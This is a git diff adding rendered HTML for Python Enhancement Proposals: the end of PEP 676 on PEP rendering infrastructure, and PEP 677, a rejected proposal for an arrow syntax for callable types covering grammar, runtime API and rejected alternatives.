Due to server-side redirects to the new canonical URLs, links in previously +published materials referring to the old URL schemes will be guaranteed to work. +All PEPs will continue to render correctly, and a custom stylesheet in the +reference implementation improves presentation for some elements (most notably +code blocks and block quotes). Therefore, this PEP presents no backwards +compatibility issues.

+
+
+

Security Implications

+

The main python.org website will no longer process raw HTML uploads, +closing a potential threat vector. PEP rendering and deployment processes will +use modern, well-maintained code and secure automated platforms, further +reducing the potential attack surface. Therefore, we see no negative security +impact.

+
+
+

How to Teach This

+

The new canonical URLs will be publicised in the documentation. However, this +is mainly a backend infrastructure change, and there should be minimal +end-user impact. PEP 1 and PEP 12 will be updated as needed.

+
+
+

Reference Implementation

+

The proposed implementation has been merged into the python/peps repository +in a series of pull requests [9]. It uses the Sphinx documentation system +with a custom theme (supporting light and dark colour schemes) and extensions.

+

This already automatically renders all PEPs on every commit, and publishes them +to python.github.io/peps. The high level documentation for the system covers +how to render PEPs locally and +the implementation of the system.

+
+
+

Rejected Ideas

+

It would likely be possible to amend the current (as of November 2021) +rendering process to include a subset of the quality-of-life improvements and +issue mitigations mentioned above. However, we do not believe that this would +solve the distributed tooling issue.

+

It would be possible to use the output from the proposed rendering system and +import it into python.org. We would argue that this would be the worst of +both worlds, as a great deal of complexity is added whilst none is removed.

+
+
+

Acknowledgements

+
    +
  • Hugo van Kemenade
  • +
  • Pablo Galindo Salgado
  • +
  • Éric Araujo
  • +
  • Mariatta
  • +
  • C.A.M. Gerlach
  • +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0676.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0677/index.html b/pep-0677/index.html new file mode 100644 index 00000000000..67dabbafb86 --- /dev/null +++ b/pep-0677/index.html @@ -0,0 +1,1384 @@ + + + + + + + + PEP 677 – Callable Type Syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 677 – Callable Type Syntax

+
+
Author:
+
Steven Troxler <steven.troxler at gmail.com>, +Pradeep Kumar Srinivasan <gohanpra at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
13-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
16-Dec-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a concise and friendly syntax for callable types, +supporting the same functionality as typing.Callable but with an +arrow syntax inspired by the syntax for typed function +signatures. This allows types like Callable[[int, str], bool] to +be written as (int, str) -> bool.

+

The proposed syntax supports all the functionality provided by +typing.Callable and typing.Concatenate, and is intended to +work as a drop-in replacement.

+
+
+

Motivation

+

One way to make code safer and easier to analyze is by making sure +that functions and classes are well-typed. In Python we have type +annotations, the framework for which is defined in PEP 484, to provide +type hints that can find bugs as well as helping with editor tooling +like tab completion, static analysis tooling, and code review.

+

Consider the following untyped code:

+
def flat_map(func, l):
+    out = []
+    for element in l:
+        out.extend(func(element))
+    return out
+
+
+def wrap(x: int) -> list[int]:
+    return [x]
+
+def add(x: int, y: int) -> int:
+    return x + y
+
+flat_map(wrap, [1, 2, 3])  # no runtime error, output is [1, 2, 3]
+flat_map(add, [1, 2, 3])   # runtime error: `add` expects 2 arguments, got 1
+
+
+

We can add types to this example to detect the runtime error:

+
from typing import Callable
+
+def flat_map(
+    func: Callable[[int], list[int]],
+    l: list[int]
+) -> list[int]:
+    ....
+
+...
+
+
+flat_map(wrap, [1, 2, 3])  # type checks okay, output is [1, 2, 3]
+flat_map(add, [1, 2, 3])   # type check error
+
+
+

There are a few usability challenges with Callable we can see here:

+
    +
  • It is verbose, particularly for more complex function signatures.
  • +
  • It relies on two levels of nested brackets, unlike any other generic +type. This can be especially hard to read when some of the type +parameters are themselves generic types.
  • +
  • The bracket structure is not visually similar to how function signatures +are written.
  • +
  • It requires an explicit import, unlike many of the other most common +types like list and dict.
  • +
+

Possibly as a result, programmers often fail to write complete +Callable types. +Such untyped or partially-typed callable types do not check the +parameter types or return types of the given callable and thus negate +the benefits of static typing. For example, they might write this:

+
from typing import Callable
+
+def flat_map(
+    func: Callable[..., Any],
+    l: list[int]
+) -> list[int]:
+    ....
+
+...
+
+
+flat_map(add, [1, 2, 3])  # oops, no type check error!
+
+
+

There’s some partial type information here - we at least know that func +needs to be callable. But we’ve dropped too much type information for +type checkers to find the bug.

+

With our proposal, the example looks like this:

+
def flat_map(
+    func: (int) -> list[int],
+    l: list[int]
+) -> list[int]:
+    out = []
+    for element in l:
+        out.extend(f(element))
+    return out
+
+...
+
+
+

The type (int) -> list[int] is more concise, uses an arrow similar +to the one indicating a return type in a function header, avoids +nested brackets, and does not require an import.

+
+
+

Rationale

+

The Callable type is widely used. For example, as of October 2021 +it was +the fifth most common complex type in typeshed, after Optional, +Tuple, Union, and List.

+

The others have had their syntax improved and the need for imports +eliminated by either PEP 604 or PEP 585:

+
    +
  • typing.Optional[int] is written int | None
  • +
  • typing.Union[int, str] is written int | str
  • +
  • typing.List[int] is written list[int]
  • +
  • typing.Tuple[int, str] is written tuple[int, str]
  • +
+

The typing.Callable type is used almost as often as these other +types, is more complicated to read and write, and still requires an +import and bracket-based syntax.

+

In this proposal, we chose to support all the existing semantics of +typing.Callable, without adding support for new features. We made +this decision after examining how frequently each feature might be +used in existing typed and untyped open-source code. We determined +that the vast majority of use cases are covered.

+

We considered adding support for named, optional, and variadic +arguments. However, we decided against including these features, as +our analysis showed they are infrequently used. When they are really +needed, it is possible to type these using callback protocols.

+
+

An Arrow Syntax for Callable Types

+

We are proposing a succinct, easy-to-use syntax for +typing.Callable that looks similar to function headers in Python. +Our proposal closely follows syntax used by several popular languages +such as Typescript, +Kotlin, and Scala.

+

Our goals are that:

+
    +
  • Callable types using this syntax will be easier to learn and use, +particularly for developers with experience in other languages.
  • +
  • Library authors will be more likely to use expressive types for +callables that enable type checkers to better understand code and +find bugs, as in the decorator example above.
  • +
+

Consider this simplified real-world example from a web server, written +using the existing typing.Callable:

+
from typing import Awaitable, Callable
+from app_logic import Response, UserSetting
+
+
+def customize_response(
+    response: Response,
+    customizer: Callable[[Response, list[UserSetting]], Awaitable[Response]]
+) -> Response:
+   ...
+
+
+

With our proposal, this code can be abbreviated to:

+
from app_logic import Response, UserSetting
+
+def customize_response(
+    response: Response,
+    customizer: async (Response, list[UserSetting]) -> Response,
+) -> Response:
+    ...
+
+
+

This is shorter and requires fewer imports. It also has far less +nesting of square brackets - only one level, as opposed to three in +the original code.

+
+
+

Compact Syntax for ParamSpec

+

A particularly common case where library authors leave off type information +for callables is when defining decorators. Consider the following:

+
from typing import Any, Callable
+
+def with_retries(
+    f: Callable[..., Any]
+) -> Callable[..., Any]:
+    def wrapper(retry_once, *args, **kwargs):
+        if retry_once:
+            try: return f(*args, **kwargs)
+            except Exception: pass
+        return f(*args, **kwargs)
+    return wrapper
+
+@with_retries
+def f(x: int) -> int:
+    return x
+
+
+f(y=10)  # oops - no type error!
+
+
+

In the code above, it is clear that the decorator should produce a +function whose signature is like that of the argument f other +than an additional retry_once argument. But the use of ... +prevents a type checker from seeing this and alerting a user that +f(y=10) is invalid.

+

With PEP 612 it is possible to type decorators like this correctly +as follows:

+
from typing import Any, Callable, Concatenate, ParamSpec, TypeVar
+
+R = TypeVar("R")
+P = ParamSpec("P")
+
+def with_retries(
+    f: Callable[P, R]
+) -> Callable[Concatenate[bool, P] R]:
+    def wrapper(retry_once: bool, *args: P.args, **kwargs: P.kwargs) -> R:
+        ...
+    return wrapper
+
+...
+
+
+

With our proposed syntax, the properly-typed decorator example becomes +concise and the type representations are visually descriptive:

+
from typing import Any, ParamSpec, TypeVar
+
+R = TypeVar("R")
+P = ParamSpec("P")
+
+def with_retries(
+    f: (**P) -> R
+) -> (bool, **P) -> R:
+    ...
+
+
+
+
+

Comparing to Other Languages

+

Many popular programming languages use an arrow syntax similar +to the one we are proposing here.

+
+

TypeScript

+

In TypeScript, +function types are expressed in a syntax almost the same as the one we +are proposing, but the arrow token is => and arguments have names:

+
(x: int, y: str) => bool
+
+
+

The names of the arguments are not actually relevant to the type. So, +for example, this is the same callable type:

+
(a: int, b: str) => bool
+
+
+
+
+

Kotlin

+

Function types in Kotlin permit +an identical syntax to the one we are proposing, for example:

+
(Int, String) -> Bool
+
+
+

It also optionally allows adding names to the arguments, for example:

+
(x: Int, y: String) -> Bool
+
+
+

As in TypeScript, the argument names (if provided) are just there for +documentation and are not part of the type itself.

+
+
+

Scala

+

Scala +uses the => arrow for function types. Other than that, their syntax is +the same as the one we are proposing, for example:

+
(Int, String) => Bool
+
+
+

Scala, like Python, has the ability to provide function arguments by name. +Function types can optionally include names, for example:

+
(x: Int, y: String) => Bool
+
+
+

Unlike in TypeScript and Kotlin, these names are part of the type if +provided - any function implementing the type must use the same names. +This is similar to the extended syntax proposal we describe in our +Rejected Alternatives section.

+
+
+

Function Definitions vs Callable Type Annotations

+

In all of the languages listed above, type annotations for function +definitions use a : rather than a ->. For example, in TypeScript +a simple add function looks like this:

+
function higher_order(fn: (a: string) => string): string {
+  return fn("Hello, World");
+}
+
+
+

Scala and Kotlin use essentially the same : syntax for return +annotations. The : makes sense in these languages because they +all use : for type annotations of +parameters and variables, and the use for function return types is +similar.

+

In Python we use : to denote the start of a function body and +-> for return annotations. As a result, even though our proposal +is superficially the same as these other languages the context is +different. There is potential for more confusion in Python when +reading function definitions that include callable types.

+

This is a key concern for which we are seeking feedback with our draft +PEP; one idea we have floated is to use => instead to make it easier +to differentiate.

+
+
+

The ML Language Family

+

Languages in the ML family, including F#, +OCaml, +and Haskell, all use +-> to represent function types. All of them use a parentheses-free +syntax with multiple arrows, for example in Haskell:

+
Integer -> String -> Bool
+
+
+

The use of multiple arrows, which differs from our proposal, makes +sense for languages in this family because they use automatic +currying of function arguments, +which means that a multi-argument function behaves like a single-argument +function returning a function.

+
+
+
+
+

Specification

+
+

Typing Behavior

+

Type checkers should treat the new syntax with exactly the same +semantics as typing.Callable.

+

As such, a type checker should treat the following pairs exactly the +same:

+
from typing import Awaitable, Callable, Concatenate, ParamSpec, TypeVarTuple
+
+P = ParamSpec("P")
+Ts = TypeVarTuple('Ts')
+
+f0: () -> bool
+f0: Callable[[], bool]
+
+f1: (int, str) -> bool
+f1: Callable[[int, str], bool]
+
+f2: (...) -> bool
+f2: Callable[..., bool]
+
+f3: async (str) -> str
+f3: Callable[[str], Awaitable[str]]
+
+f4: (**P) -> bool
+f4: Callable[P, bool]
+
+f5: (int, **P) -> bool
+f5: Callable[Concatenate[int, P], bool]
+
+f6: (*Ts) -> bool
+f6: Callable[[*Ts], bool]
+
+f7: (int, *Ts, str) -> bool
+f7: Callable[[int, *Ts, str], bool]
+
+
+
+
+

Grammar and AST

+

The proposed new syntax can be described by these AST changes to Parser/Python.asdl:

+
expr = <prexisting_expr_kinds>
+     | AsyncCallableType(callable_type_arguments args, expr returns)
+     | CallableType(callable_type_arguments args, expr returns)
+
+callable_type_arguments = AnyArguments
+                        | ArgumentsList(expr* posonlyargs)
+                        | Concatenation(expr* posonlyargs, expr param_spec)
+
+
+

Here are our proposed changes to the Python Grammar +<https://docs.python.org/3/reference/grammar.htm>:

+
expression:
+    | disjunction disjunction 'else' expression
+    | callable_type_expression
+    | disjunction
+    | lambdef
+
+callable_type_expression:
+    | callable_type_arguments '->' expression
+    | ASYNC callable_type_arguments '->' expression
+
+callable_type_arguments:
+    | '(' '...' [','] ')'
+    | '(' callable_type_positional_argument*  ')'
+    | '(' callable_type_positional_argument* callable_type_param_spec ')'
+
+callable_type_positional_argument:
+    | !'...' expression ','
+    | !'...' expression &')'
+
+callable_type_param_spec:
+    | '**' expression ','
+    | '**' expression &')'
+
+
+

If PEP 646 is accepted, we intend to include support for unpacked +types in two ways. To support the “star-for-unpack” syntax proposed in +PEP 646, we will modify the grammar for +callable_type_positional_argument as follows:

+
callable_type_positional_argument:
+    | !'...' expression ','
+    | !'...' expression &')'
+    | '*' expression ','
+    | '*' expression &')'
+
+
+

With this change, a type of the form (int, *Ts) -> bool should +evaluate the AST form:

+
CallableType(
+    ArgumentsList(Name("int"), Starred(Name("Ts")),
+    Name("bool")
+)
+
+
+

and be treated by type checkers as equivalent to or Callable[[int, +*Ts], bool] or Callable[[int, Unpack[Ts]], bool].

+
+
+

Implications of the Grammar

+
+

Precedence of ->

+

-> binds less tightly than other operators, both inside types and +in function signatures, so the following two callable types are +equivalent:

+
(int) -> str | bool
+(int) -> (str | bool)
+
+
+

-> associates to the right, both inside types and in function +signatures. So the following pairs are equivalent:

+
(int) -> (str) -> bool
+(int) -> ((str) -> bool)
+
+def f() -> (int, str) -> bool: pass
+def f() -> ((int, str) -> bool): pass
+
+def f() -> (int) -> (str) -> bool: pass
+def f() -> ((int) -> ((str) -> bool)): pass
+
+
+

Because operators bind more tightly than ->, parentheses are +required whenever an arrow type is intended to be inside an argument +to an operator like |:

+
(int) -> () -> int | () -> bool      # syntax error!
+(int) -> (() -> int) | (() -> bool)  # okay
+
+
+

We discussed each of these behaviors and believe they are desirable:

+
    +
  • Union types (represented by A | B according to PEP 604) are +valid in function signature returns, so we need to allow operators +in the return position for consistency.
  • +
  • Given that operators bind more tightly than -> it is correct +that a type like bool | () -> bool must be a syntax error. We +should be sure the error message is clear because this may be a +common mistake.
  • +
  • Associating -> to the right, rather than requiring explicit +parentheses, is consistent with other languages like TypeScript and +respects the principle that valid expressions should normally be +substitutable when possible.
  • +
+
+
+

async Keyword

+

All of the binding rules still work for async callable types:

+
(int) -> async (float) -> str | bool
+(int) -> (async (float) -> (str | bool))
+
+def f() -> async (int, str) -> bool: pass
+def f() -> (async (int, str) -> bool): pass
+
+def f() -> async (int) -> async (str) -> bool: pass
+def f() -> (async (int) -> (async (str) -> bool)): pass
+
+
+
+
+

Trailing Commas

+
    +
  • Following the precedent of function signatures, putting a comma in +an empty arguments list is illegal: (,) -> bool is a syntax +error.
  • +
  • Again following precedent, trailing commas are otherwise always +permitted:
    ((int,) -> bool == (int) -> bool
    +((int, **P,) -> bool == (int, **P) -> bool
    +((...,) -> bool) == ((...) -> bool)
    +
    +
    +
  • +
+

Allowing trailing commas also gives autoformatters more flexibility +when splitting callable types across lines, which is always legal +following standard python whitespace rules.

+
+
+

Disallowing ... as an Argument Type

+

Under normal circumstances, any valid expression is permitted where we +want a type annotation and ... is a valid expression. This is +never semantically valid and all type checkers would reject it, but +the grammar would allow it if we did not explicitly prevent this.

+

Since ... is meaningless as a type and there are usability +concerns, our grammar rules it out and the following is a syntax +error:

+
(int, ...) -> bool
+
+
+

We decided that there were compelling reasons to do this:

+
    +
  • The semantics of (...) -> bool are different from (T) -> bool +for any valid type T: (...) is a special form indicating +AnyArguments whereas T is a type parameter in the arguments +list.
  • +
  • ... is used as a placeholder default value to indicate an +optional argument in stubs and callback protocols. Allowing it in +the position of a type could easily lead to confusion and possibly +bugs due to typos.
  • +
  • In the tuple generic type, we special-case ... to mean +“more of the same”, e.g. a tuple[int, ...] means a tuple with +one or more integers. We do not use ... in a a similar way +in callable types, so to prevent misunderstandings it makes sense +to prevent this.
  • +
+
+
+

Incompatibility with other possible uses of * and **

+

The use of **P for supporting PEP 612 ParamSpec rules out any +future proposal using a bare **<some_type> to type +kwargs. This seems acceptable because:

+
    +
  • If we ever do want such a syntax, it would be clearer to require an +argument name anyway. This would also make the type look more +similar to a function signature. In other words, if we ever support +typing kwargs in callable types, we would prefer (int, +**kwargs: str) rather than (int, **str).
  • +
  • PEP 646 unpacking syntax would rule out using *<some_type> for +args. The kwargs case is similar enough that this rules out +a bare **<some_type> anyway.
  • +
+
+
+

Compatibility with Arrow-Based Lambda Syntax

+

To the best of our knowledge there is no active discussion of +arrow-style lambda syntax that we are aware of, but it is nonetheless +worth considering what possibilities would be ruled out by adopting +this proposal.

+

It would be incompatible with this proposal to adopt the same a +parenthesized ->-based arrow syntax for lambdas, e.g. (x, y) -> +x + y for lambda x, y: x + y.

+

Our view is that if we want arrow syntax for lambdas in the future, it +would be a better choice to use =>, e.g. (x, y) => x + y. +Many languages use the same arrow token for both lambdas and callable +types, but Python is unique in that types are expressions and have to +evaluate to runtime values. Our view is that this merits using +separate tokens, and given the existing use of -> for return types +in function signatures it would be more coherent to use -> for +callable types and => for lambdas.

+
+
+
+

Runtime Behavior

+

The new AST nodes need to evaluate to runtime types, and we have two goals for the +behavior of these runtime types:

+
    +
  • They should expose a structured API that is descriptive and powerful +enough to be compatible with extending the type to include new features +like named and variadic arguments.
  • +
  • They should also expose an API that is backward-compatible with +typing.Callable.
  • +
+
+

Evaluation and Structured API

+

We intend to create new builtin types to which the new AST nodes will +evaluate, exposing them in the types module.

+

Our plan is to expose a structured API as if they were defined as follows:

+
class CallableType:
+    is_async: bool
+    arguments: Ellipsis | tuple[CallableTypeArgument]
+    return_type: object
+
+class CallableTypeArgument:
+    kind: CallableTypeArgumentKind
+    annotation: object
+
+@enum.global_enum
+class CallableTypeArgumentKind(enum.IntEnum):
+    POSITIONAL_ONLY: int = ...
+    PARAM_SPEC: int = ...
+
+
+

The evaluation rules are expressed in terms of the following +pseudocode:

+
def evaluate_callable_type(
+    callable_type: ast.CallableType | ast.AsyncCallableType:
+) -> CallableType:
+    return CallableType(
+       is_async=isinstance(callable_type, ast.AsyncCallableType),
+       arguments=_evaluate_arguments(callable_type.arguments),
+       return_type=evaluate_expression(callable_type.returns),
+    )
+
+def _evaluate_arguments(arguments):
+    match arguments:
+        case ast.AnyArguments():
+            return Ellipsis
+        case ast.ArgumentsList(posonlyargs):
+            return tuple(
+                _evaluate_arg(arg) for arg in args
+            )
+        case ast.ArgumentsListConcatenation(posonlyargs, param_spec):
+            return tuple(
+                *(evaluate_arg(arg) for arg in args),
+                _evaluate_arg(arg=param_spec, kind=PARAM_SPEC)
+            )
+        if isinstance(arguments, Any
+    return Ellipsis
+
+def _evaluate_arg(arg, kind=POSITIONAL_ONLY):
+    return CallableTypeArgument(
+        kind=POSITIONAL_ONLY,
+        annotation=evaluate_expression(value)
+    )
+
+
+
+
+

Backward-Compatible API

+

To get backward compatibility with the existing types.Callable API, +which relies on fields __args__ and __parameters__, we can define +them as if they were written in terms of the following:

+
import itertools
+import typing
+
+def get_args(t: CallableType) -> tuple[object]:
+    return_type_arg = (
+        typing.Awaitable[t.return_type]
+        if t.is_async
+        else t.return_type
+    )
+    arguments = t.arguments
+    if isinstance(arguments, Ellipsis):
+        argument_args = (Ellipsis,)
+    else:
+        argument_args = (arg.annotation for arg in arguments)
+    return (
+        *arguments_args,
+        return_type_arg
+    )
+
+def get_parameters(t: CallableType) -> tuple[object]:
+    out = []
+    for arg in get_args(t):
+        if isinstance(arg, typing.ParamSpec):
+            out.append(t)
+        else:
+            out.extend(arg.__parameters__)
+    return tuple(out)
+
+
+
+
+

Additional Behaviors of types.CallableType

+

As with the A | B syntax for unions introduced in PEP 604:

+
    +
  • The __eq__ method should treat equivalent typing.Callable +values as equal to values constructed using the builtin syntax, and +otherwise should behave like the __eq__ of typing.Callable.
  • +
  • The __repr__ method should produce an arrow syntax representation that, +when evaluated, gives us back an equal types.CallableType instance.
  • +
+
+
+
+
+

Rejected Alternatives

+

Many of the alternatives we considered would have been more expressive +than typing.Callable, for example adding support for describing +signatures that include named, optional, and variadic arguments.

+

To determine which features we most needed to support with a callable +type syntax, we did an extensive analysis of existing projects:

+ +

We decided on a simple proposal with improved syntax for the existing +Callable type because the vast majority of callbacks can be correctly +described by the existing typing.Callable semantics:

+
    +
  • Positional parameters: By far the most important case to handle well +is simple callable types with positional parameters, such as +(int, str) -> bool
  • +
  • ParamSpec and Concatenate: The next most important feature is good +support for PEP 612 ParamSpec and Concatenate types like +(**P) -> bool and (int, **P) -> bool. These are common +primarily because of the heavy use of decorator patterns in python +code.
  • +
  • TypeVarTuples: The next most important feature, assuming PEP 646 is +accepted, is for unpacked types which are common because of cases +where a wrapper passes along *args to some other function.
  • +
+

Features that other, more complicated proposals would support account +for fewer than 2% of the use cases we found. These are already +expressible using callback protocols, and since they are uncommon we +decided that it made more sense to move forward with a simpler syntax.

+
+

Extended Syntax Supporting Named and Optional Arguments

+

Another alternative was for a compatible but more complex syntax that +could express everything in this PEP but also named, optional, and +variadic arguments. In this “extended” syntax proposal the following +types would have been equivalent:

+
class Function(typing.Protocol):
+    def f(self, x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool:
+        ...
+
+Function = (int, y: float, *, z: bool = ..., **kwargs: str) -> bool
+
+
+

Advantages of this syntax include: - Most of the advantages of the +proposal in this PEP (conciseness, PEP 612 support, etc) - +Furthermore, the ability to handle named, optional, and variadic +arguments

+

We decided against proposing it for the following reasons:

+
    +
  • The implementation would have been more difficult, and usage stats +demonstrate that fewer than 3% of use cases would benefit from any +of the added features.
  • +
  • The group that debated these proposals was split down the middle +about whether these changes are desirable:
      +
    • On the one hand, they make callable types more expressive. On the +other hand, they could easily confuse users who have not read the +full specification of callable type syntax.
    • +
    • We believe the simpler syntax proposed in this PEP, which +introduces no new semantics and closely mimics syntax in other +popular languages like Kotlin, Scala, and TypesScript, is much +less likely to confuse users.
    • +
    +
  • +
  • We intend to implement the current proposal in a way that is +forward-compatible with the more complicated extended syntax. If the +community decides after more experience and discussion that we want +the additional features, it should be straightforward to propose +them in the future.
  • +
  • Even a full extended syntax cannot replace the use of callback +protocols for overloads. For example, no closed form of callable type +could express a function that maps bools to bools and ints to floats, +like this callback protocol.:
    from typing import overload, Protocol
    +
    +class OverloadedCallback(Protocol)
    +
    +  @overload
    +  def __call__(self, x: int) -> float: ...
    +
    +  @overload
    +  def __call__(self, x: bool) -> bool: ...
    +
    +  def __call__(self, x: int | bool) -> float | bool: ...
    +
    +
    +f: OverloadedCallback = ...
    +f(True)  # bool
    +f(3)     # float
    +
    +
    +
  • +
+

We confirmed that the current proposal is forward-compatible with +extended syntax by +implementing +a grammar and AST for this extended syntax on top of our reference +implementation of this PEP’s grammar.

+
+
+

Syntax Closer to Function Signatures

+

One alternative we had floated was a syntax much more similar to +function signatures.

+

In this proposal, the following types would have been equivalent:

+
class Function(typing.Protocol):
+    def f(self, x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool:
+        ...
+
+Function = (x: int, /, y: float, *, z: bool = ..., **kwargs: str) -> bool
+
+
+

The benefits of this proposal would have included:

+
    +
  • Perfect syntactic consistency between signatures and callable types.
  • +
  • Support for more features of function signatures (named, optional, +variadic args) that this PEP does not support.
  • +
+

Key downsides that led us to reject the idea include the following:

+
    +
  • A large majority of use cases only use positional-only arguments. This +syntax would be more verbose for that use case, both because of requiring +argument names and an explicit /, for example (int, /) -> bool where +our proposal allows (int) -> bool
  • +
  • The requirement for explicit / for positional-only arguments has +a high risk of causing frequent bugs - which often would not be +detected by unit tests - where library authors would accidentally +use types with named arguments.
  • +
  • Our analysis suggests that support for ParamSpec is key, but the +scoping rules laid out in PEP 612 would have made this difficult.
  • +
+
+
+

Other Proposals Considered

+
+

Functions-as-Types

+

An idea we looked at very early on was to allow using functions as types. +The idea is allowing a function to stand in for its own call +signature, with roughly the same semantics as the __call__ method +of callback protocols:

+
def CallableType(
+    positional_only: int,
+    /,
+    named: str,
+    *args: float,
+    keyword_only: int = ...,
+    **kwargs: str
+) -> bool: ...
+
+f: CallableType = ...
+f(5, 6.6, 6.7, named=6, x="hello", y="world")  # typechecks as bool
+
+
+

This may be a good idea, but we do not consider it a viable +replacement for callable types:

+
    +
  • It would be difficult to handle ParamSpec, which we consider a +critical feature to support.
  • +
  • When using functions as types, the callable types are not first-class +values. Instead, they require a separate, out-of-line function +definition to define a type alias
  • +
  • It would not support more features than callback protocols, and seems +more like a shorter way to write them than a replacement for +Callable.
  • +
+
+
+

Hybrid keyword-arrow Syntax

+

In the Rust language, a keyword fn is used to indicate functions +in much the same way as Python’s def, and callable types are +indicated using a hybrid arrow syntax Fn(i64, String) -> bool.

+

We could use the def keyword in callable types for Python, for +example our two-parameter boolean function could be written as +def(int, str) -> bool. But we think this might confuse readers +into thinking def(A, B) -> C is a lambda, particularly because +Javascript’s function keyword is used in both named and anonymous +functions.

+
+
+

Parenthesis-Free Syntax

+

We considered a parentheses-free syntax that would have been even more +concise:

+
int, str -> bool
+
+
+

We decided against it because this is not visually as similar to +existing function header syntax. Moreover, it is visually similar to +lambdas, which bind names with no parentheses: lambda x, y: x == +y.

+
+
+

Requiring Outer Parentheses

+

A concern with the current proposal is readability, particularly +when callable types are used in return type position which leads to +multiple top-level -> tokens, for example:

+
def make_adder() -> (int) -> int:
+    return lambda x: x + 1
+
+
+

We considered a few ideas to prevent this by changing rules about +parentheses. One was to move the parentheses to the outside, so +that a two-argument boolean function is written (int, str -> bool). +With this change, the example above becomes:

+
def make_adder() -> (int -> int):
+    return lambda x: x + 1
+
+
+

This makes the nesting of many examples that are difficult to +follow clear, but we rejected it because

+
    +
  • Currently in Python commas bind very loosely, which means it might be common +to misread (int, str -> bool) as a tuple whose first element is an int, +rather than a two-parameter callable type.
  • +
  • It is not very similar to function header syntax, and one of our goals was +familiar syntax inspired by function headers.
  • +
  • This syntax may be more readable for deaply nested callables like the one +above, but deep nesting is not very common. Encouraging extra parentheses +around callable types in return position via a style guide would have most of +the readability benefit without the downsides.
  • +
+

We also considered requiring parentheses on both the parameter list and the +outside, e.g. ((int, str) -> bool). With this change, the example above +becomes:

+
def make_adder() -> ((int) -> int):
+    return lambda x: x + 1
+
+
+

We rejected this change because:

+
    +
  • The outer parentheses only help readability in some cases, mostly when a +callable type is used in return position. In many other cases they hurt +readability rather than helping.
  • +
  • We agree that it might make sense to encourage outer parentheses in several +cases, particularly callable types in function return annotations. But
      +
    • We believe it is more appropriate to encourage this in style guides, +linters, and autoformatters than to bake it into the parser and throw +syntax errors.
    • +
    • Moreover, if a type is complicated enough that readability is a concern +we can always use type aliases, for example:
      IntToIntFunction: (int) -> int
      +
      +def make_adder() -> IntToIntFunction:
      +    return lambda x: x + 1
      +
      +
      +
    • +
    +
  • +
+
+
+

Making -> bind tighter than |

+

In order to allow both -> and | tokens in type expressions we +had to choose precedence. In the current proposal, this is a function +returning an optional boolean:

+
(int, str) -> bool | None  # equivalent to (int, str) -> (bool | None)
+
+
+

We considered having -> bind tighter so that instead the expression +would parse as ((int, str) -> bool) | None. There are two advantages +to this:

+
    +
  • It means we no would longer have to treat None | (int, str) -> +bool as a syntax error.
  • +
  • Looking at typeshed today, optional callable arguments are very common +because using None as a default value is a standard Python idiom. +Having -> bind tighter would make these easier to write.
  • +
+

We decided against this for a few reasons:

+
    +
  • The function header def f() -> int | None: ... is legal +and indicates a function returning an optional int. To be consistent +with function headers, callable types should do the same.
  • +
  • TypeScript is the other popular language we know of that uses both +-> and | tokens in type expressions, and they have | bind +tighter. While we do not have to follow their lead, we prefer to do +so.
  • +
  • We do acknowledge that optional callable types are common and +having | bind tighter forces extra parentheses, which makes these +types harder to write. But code is read more often than written, and +we believe that requiring the outer parentheses for an optional callable +type like ((int, str) -> bool) | None is preferable for readability.
  • +
+
+
+

Introducing type-strings

+

Another idea was adding a new “special string” syntax and putting the type +inside of it, for example t”(int, str) -> bool”. We rejected this +because it is not as readable, and seems out of step with guidance +from the Steering Council on ensuring that type expressions do not +diverge from the rest of Python’s syntax.

+
+
+

Improving Usability of the Indexed Callable Type

+

If we do not want to add new syntax for callable types, we could +look at how to make the existing type easier to read. One proposal +would be to make the builtin callable function indexable so +that it could be used as a type:

+
callable[[int, str], bool]
+
+
+

This change would be analogous to PEP 585 that made built in collections +like list and dict usable as types, and would make imports +more convenient, but it wouldn’t help readability of the types themselves +much.

+

In order to reduce the number of brackets needed in complex callable +types, it would be possible to allow tuples for the argument list:

+
callable[(int, str), bool]
+
+
+

This actually is a significant readability improvement for +multi-argument functions, but the problem is that it makes callables +with one arguments, which are the most common arity, hard to +write: because (x) evaluates to x, they would have to be +written like callable[(int,), bool]. We find this awkward.

+

Moreover, none of these ideas help as much with reducing verbosity +as the current proposal, nor do they introduce as strong a visual cue +as the -> between the parameter types and the return type.

+
+
+
+

Alternative Runtime Behaviors

+

The hard requirements on our runtime API are that:

+
    +
  • It must preserve backward compatibility with typing.Callable via +__args__ and __params__.
  • +
  • It must provide a structured API, which should be extensible if +in the future we try to support named and variadic arguments.
  • +
+
+

Alternative APIs

+

We considered having the runtime data types.CallableType use a +more structured API where there would be separate fields for +posonlyargs and param_spec. The current proposal was +was inspired by the inspect.Signature type.

+

We use “argument” in our field and type names, unlike “parameter” +as in inspect.Signature, in order to avoid confusion with +the callable_type.__parameters__ field from the legacy API +that refers to type parameters rather than callable parameters.

+
+
+

Using the plain return type in __args__ for async types

+

It is debatable whether we are required to preserve backward compatibility +of __args__ for async callable types like async (int) -> str. The +reason is that one could argue they are not expressible directly +using typing.Callable, and therefore it would be fine to set +__args__ as (int, int) rather than (int, typing.Awaitable[int]).

+

But we believe this would be problematic. By preserving the appearance +of a backward-compatible API while actually breaking its semantics on +async types, we would cause runtime type libraries that attempt to +interpret Callable using __args__ to fail silently.

+

It is for this reason that we automatically wrap the return type in +Awaitable.

+
+
+
+
+

Backward Compatibility

+

This PEP proposes a major syntax improvement over typing.Callable, +but the static semantics are the same.

+

As such, the only thing we need for backward compatibility is to +ensure that types specified via the new syntax behave the same as +equivalent typing.Callable and typing.Concatenate values they +intend to replace.

+

